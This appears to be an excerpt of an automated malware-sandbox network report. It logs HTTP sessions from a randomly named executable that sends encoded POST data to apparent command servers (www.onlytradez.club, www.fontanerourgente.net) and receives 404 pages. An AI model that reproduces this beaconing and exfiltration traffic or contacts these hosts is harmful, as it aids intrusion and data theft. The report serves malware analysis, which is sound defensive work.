            Data Ascii: mojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionSto
            Sep 2, 2024 09:08:30.976320028 CEST1236INData Raw: 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62
            Data Ascii: n(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script>
            Sep 2, 2024 09:08:30.976331949 CEST1236INData Raw: 65 6d 62 65 64 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a
            Data Ascii: embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}:root :where(.wp-block-image figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme
            Sep 2, 2024 09:08:30.976344109 CEST1236INData Raw: 69 6e 67 3a 31 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 2d 63 73 73 2d 6f 70 61 63 69 74 79 7b 6f 70 61 63 69 74 79 3a 2e 34 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61
            Data Ascii: ing:1.25em 2.375em}.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-st
            Sep 2, 2024 09:08:30.976593971 CEST1236INData Raw: 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 5f 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 32 33 37 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 3c 2f
            Data Ascii: 25em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style>2000<style id='global-styles-inline-css'>:root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio-
            Sep 2, 2024 09:08:30.976613045 CEST1236INData Raw: 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32
            Data Ascii: et--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp
            Sep 2, 2024 09:08:30.976624966 CEST1236INData Raw: 72 67 62 28 32 35 35 2c 32 34 35 2c 32 30 33 29 20 30 25 2c 72 67 62 28 31 38 32 2c 32 32 37 2c 32 31 32 29 20 35 30 25 2c 72 67 62 28 35 31 2c 31 36 37 2c 31 38 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69
            Data Ascii: rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,r
            Sep 2, 2024 09:08:30.981173992 CEST1236INData Raw: 2d 73 69 7a 65 2d 2d 65 78 74 72 61 2d 6c 61 72 67 65 3a 20 34 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 68 75 67 65 3a 20 39 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69
            Data Ascii: -size--extra-large: 40px;--wp--preset--font-size--huge: 96px;--wp--preset--font-size--gigantic: 144px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp-


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            8192.168.2.64973137.187.158.211802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:08:32.609088898 CEST511OUTGET /t3gh/?cLqL3H=d/YHbjU0lRTRkwDy0zIPv6PdUN2QowQER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthetgJD5Cj99fT73mV1toZHsOXJ+4nrRaepQcEbq6LCfz7oYbWletg=&rZwP=sHyxifGPIFN HTTP/1.1
            Host: www.fontanerourgente.net
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Connection: close
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Sep 2, 2024 09:08:33.465836048 CEST1236INHTTP/1.1 404 Not Found
            Date: Mon, 02 Sep 2024 07:08:33 GMT
            Server: Apache
            Expires: Wed, 11 Jan 1984 05:00:00 GMT
            Cache-Control: no-cache, must-revalidate, max-age=0
            Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
            Connection: close
            Transfer-Encoding: chunked
            Content-Type: text/html; charset=UTF-8
            Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
            Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Pgina no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
            Sep 2, 2024 09:08:33.465857983 CEST1236INData Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
            Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas
            Sep 2, 2024 09:08:33.465869904 CEST1236INData Raw: 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29
            Data Ascii: ),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupport
            Sep 2, 2024 09:08:33.466094971 CEST1236INData Raw: 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e
            Data Ascii: (n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return
            Sep 2, 2024 09:08:33.466106892 CEST896INData Raw: 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65 3b 70 61 64 64 69 6e 67 3a 2e 38 65 6d 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62
            Data Ascii: ius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed :where(figcaption){color:#ffffffa6}.wp-block-embed{margin:0 0 1e
            Sep 2, 2024 09:08:33.466116905 CEST1236INData Raw: 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d
            Data Ascii: m}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-qu
            Sep 2, 2024 09:08:33.466135025 CEST1236INData Raw: 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 3a 77 68 65 72 65 28 66 69 67 63 61 70 74 69 6f 6e 29 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d
            Data Ascii: color:#ffffffa6}.wp-block-video :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video :where(figcaption){color:#ffffffa6}.wp-block-video{margin:0 0 1em}:root :where(.wp-block-template-part.has-background
            Sep 2, 2024 09:08:33.466147900 CEST1236INData Raw: 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 3a 20 23 66 63 62 39 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 37 62 64 63 62 35 3b
            Data Ascii: lor--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vi
            Sep 2, 2024 09:08:33.466330051 CEST1236INData Raw: 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31 2c 31 32 30 2c 32 30 39 29 20 32 30 25 2c 72 67 62 28 32 30 37 2c 34 32 2c 31 38 36
            Data Ascii: rum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(15
            Sep 2, 2024 09:08:33.466342926 CEST1236INData Raw: 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 36 30 64 65 67 2c 20 23 45 34 44 31 44 31 20 30 25 2c 20 23 45 45 45 41 44 44 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 79 65 6c 6c 6f 77 2d 74 6f 2d 72
            Data Ascii: ear-gradient(160deg, #E4D1D1 0%, #EEEADD 100%);--wp--preset--gradient--yellow-to-red: linear-gradient(160deg, #EEEADD 0%, #E4D1D1 100%);--wp--preset--gradient--purple-to-red: linear-gradient(160deg, #D1D1E4 0%, #E4D1D1 100%);--wp--preset--grad
            Sep 2, 2024 09:08:33.471374035 CEST1236INData Raw: 2c 20 30 2c 20 30 2c 20 31 29 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 30 2e 35 65 6d
            Data Ascii: , 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display:


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            9192.168.2.649732167.172.133.32802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:08:38.600781918 CEST764OUTPOST /zctj/ HTTP/1.1
            Host: www.onlytradez.club
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.onlytradez.club
            Referer: http://www.onlytradez.club/zctj/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 211
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 67 51 47 51 34 34 70 6a 59 51 69 6a 2b 42 72 76 52 5a 4d 69 6b 4f 73 38 78 66 37 4f 59 76 59 6b 35 69 66 43 32 54 4c 36 70 76 66 4d 55 51 4a 41 77 6f 41 48 5a 34 30 73 51 4f 53 77 4b 31 32 57 71 38 39 41 6e 4d 6e 43 71 70 39 61 75 73 34 78 6f 2b 4e 63 64 39 57 70 62 4a 67 6b 72 4f 44 66 53 52 6c 46 50 6c 47 74 4f 4b 30 44 55 38 41 78 33 62 43 42 32 77 69 61 45 64 6b 38 68 44 56 4b 44 44 72 39 6e 69 47 72 42 68 6a 4a 63 72 74 79 53 67 74 6d 63 70 35 56 71 66 42 6a 62 32 51 32 69 53 32 75 4a 39 75 7a 50 72 47 39 53 70 6f 73 6b 6b 48 73 31 58 46 32 30 6b 49 38 61 79 68 61 34 52 72 48 33 56 53 46 54 58 69 78
            Data Ascii: cLqL3H=gQGQ44pjYQij+BrvRZMikOs8xf7OYvYk5ifC2TL6pvfMUQJAwoAHZ40sQOSwK12Wq89AnMnCqp9aus4xo+Ncd9WpbJgkrODfSRlFPlGtOK0DU8Ax3bCB2wiaEdk8hDVKDDr9niGrBhjJcrtySgtmcp5VqfBjb2Q2iS2uJ9uzPrG9SposkkHs1XF20kI8ayha4RrH3VSFTXix
            Sep 2, 2024 09:08:39.037415028 CEST369INHTTP/1.1 404 Not Found
            Server: nginx/1.26.1
            Date: Mon, 02 Sep 2024 07:08:38 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Content-Encoding: gzip
            Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
            Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            10192.168.2.649733167.172.133.32802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:08:41.143419981 CEST788OUTPOST /zctj/ HTTP/1.1
            Host: www.onlytradez.club
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.onlytradez.club
            Referer: http://www.onlytradez.club/zctj/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 235
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 67 51 47 51 34 34 70 6a 59 51 69 6a 2f 6c 58 76 53 36 55 69 7a 65 73 37 74 50 37 4f 58 50 59 6f 35 69 54 43 32 57 36 2f 70 63 37 4d 4e 79 42 41 33 5a 41 48 51 6f 30 73 62 75 53 31 4f 31 32 4a 71 38 67 39 6e 4a 66 43 71 70 70 61 75 75 67 78 70 50 4e 64 63 74 57 72 55 70 67 36 6d 75 44 66 53 52 6c 46 50 6c 44 77 4f 4b 4d 44 49 63 51 78 33 2f 57 43 38 51 69 5a 46 64 6b 38 77 7a 56 57 44 44 72 44 6e 6a 62 4f 42 6e 2f 4a 63 76 6c 79 53 78 74 35 4c 5a 35 54 33 76 42 32 65 55 6c 6c 73 67 4c 50 4f 74 75 70 4d 6f 53 63 65 2f 70 32 34 58 48 50 6e 48 6c 30 30 6d 51 4f 61 53 68 77 36 52 54 48 6c 43 65 69 63 6a 48 53 52 34 71 38 71 44 34 39 32 4b 2f 68 4a 43 6f 34 48 79 51 4d 52 77 3d 3d
            Data Ascii: cLqL3H=gQGQ44pjYQij/lXvS6Uizes7tP7OXPYo5iTC2W6/pc7MNyBA3ZAHQo0sbuS1O12Jq8g9nJfCqppauugxpPNdctWrUpg6muDfSRlFPlDwOKMDIcQx3/WC8QiZFdk8wzVWDDrDnjbOBn/JcvlySxt5LZ5T3vB2eUllsgLPOtupMoSce/p24XHPnHl00mQOaShw6RTHlCeicjHSR4q8qD492K/hJCo4HyQMRw==
            Sep 2, 2024 09:08:41.557552099 CEST369INHTTP/1.1 404 Not Found
            Server: nginx/1.26.1
            Date: Mon, 02 Sep 2024 07:08:41 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Content-Encoding: gzip
            Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
            Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            11192.168.2.649735167.172.133.32802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:08:43.693257093 CEST1801OUTPOST /zctj/ HTTP/1.1
            Host: www.onlytradez.club
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.onlytradez.club
            Referer: http://www.onlytradez.club/zctj/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 1247
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 67 51 47 51 34 34 70 6a 59 51 69 6a 2f 6c 58 76 53 36 55 69 7a 65 73 37 74 50 37 4f 58 50 59 6f 35 69 54 43 32 57 36 2f 70 63 7a 4d 52 58 4e 41 30 2b 55 48 4b 6f 30 73 59 75 53 30 4f 31 32 41 71 38 34 78 6e 4a 61 31 71 72 52 61 68 72 30 78 68 64 6c 64 53 74 57 72 4d 5a 67 37 72 4f 43 4c 53 51 55 4d 50 6c 54 77 4f 4b 4d 44 49 65 34 78 67 37 43 43 76 41 69 61 45 64 6b 77 68 44 56 71 44 46 43 34 6e 6a 75 37 47 52 50 4a 63 4f 5a 79 51 43 46 35 4a 35 35 52 32 76 41 7a 65 55 34 39 73 6b 72 74 4f 75 79 54 4d 71 4f 63 64 72 41 30 6b 30 50 32 6d 52 78 30 71 78 51 46 44 47 51 41 38 57 2f 44 31 44 79 4c 65 6a 4c 62 50 64 69 33 2b 77 70 47 7a 4c 4c 54 4a 46 73 75 45 7a 78 6e 48 4a 36 72 64 4a 59 71 68 77 67 2f 67 59 50 57 33 35 36 78 6b 78 50 37 33 6e 72 4e 75 49 56 49 7a 33 69 63 35 32 2b 33 75 58 70 44 4f 2b 4b 2f 6a 6a 6e 54 6e 71 55 38 54 51 53 79 45 55 57 75 57 6e 75 75 47 47 66 7a 61 4b 41 46 56 74 61 6b 5a 76 48 6e 41 58 6a 53 34 2f 73 72 64 59 41 37 37 4a 45 39 32 4a 49 55 51 69 67 [TRUNCATED]
            Data Ascii: cLqL3H=gQGQ44pjYQij/lXvS6Uizes7tP7OXPYo5iTC2W6/pczMRXNA0+UHKo0sYuS0O12Aq84xnJa1qrRahr0xhdldStWrMZg7rOCLSQUMPlTwOKMDIe4xg7CCvAiaEdkwhDVqDFC4nju7GRPJcOZyQCF5J55R2vAzeU49skrtOuyTMqOcdrA0k0P2mRx0qxQFDGQA8W/D1DyLejLbPdi3+wpGzLLTJFsuEzxnHJ6rdJYqhwg/gYPW356xkxP73nrNuIVIz3ic52+3uXpDO+K/jjnTnqU8TQSyEUWuWnuuGGfzaKAFVtakZvHnAXjS4/srdYA77JE92JIUQigrEIaknL6JT6HLM5cvSgtZtbftjaaXq3xK4VNL5qKPgDnpnslNk6VoL9FW8K13jRdC6cNYP6BCLPupGVZEPbaEIfmStVAFJtxOLl2N+Z/gsUJqBZUwTy/RB6oVDVzp5XTJGsKviUbeSMgDeFeTm6G1ZXt+5GpxBs+KBRxy/JQdMMnmGEfBgKseGdg1zDGJawaPHpOTh5gRZn/v4l2fC+ZPqait84UlQTrgypaz4ejzd5je9+aUeKdBqYcxXB3xByGqtWKIWI4cEovd91/SC5KYPKeFACHnm/klJUBspPjjLSpzcGMzZCGk4p0hsxxcYqFuiNFDDr1iRSNvE7lX8/j/XlT1oB5DumvOa6Wa9kQE6fCeujCw4pKrKTAlhpwT5WkmYBrRa0HVmE8neK7RAe4MNHQ/MST0GaYBmC3cadjVJNmJAjgtolCnKJibGsbSCpH39g6sHGVsAgNElnRPF/MlgA/dFUNhyhYGnlRF4RlvfhxbunV8+hGaQG/wUSemEvFalihok1lmvI8+jVFlSGDZzlt0zKE2s7PRoPTy6IVWKZ16m8MNvjZT+jfd8n9IUWN2SD/SC0c+GgvmxiKG1Itz05fU40/napVUn7jzNzqQL7yU1Ygvhk3+QYesyj6SrfNPGteanXM4u1d0mxZJdkvUVwTjkrjwaqe/W [TRUNCATED]
            Sep 2, 2024 09:08:44.109420061 CEST369INHTTP/1.1 404 Not Found
            Server: nginx/1.26.1
            Date: Mon, 02 Sep 2024 07:08:44 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Content-Encoding: gzip
            Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
            Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
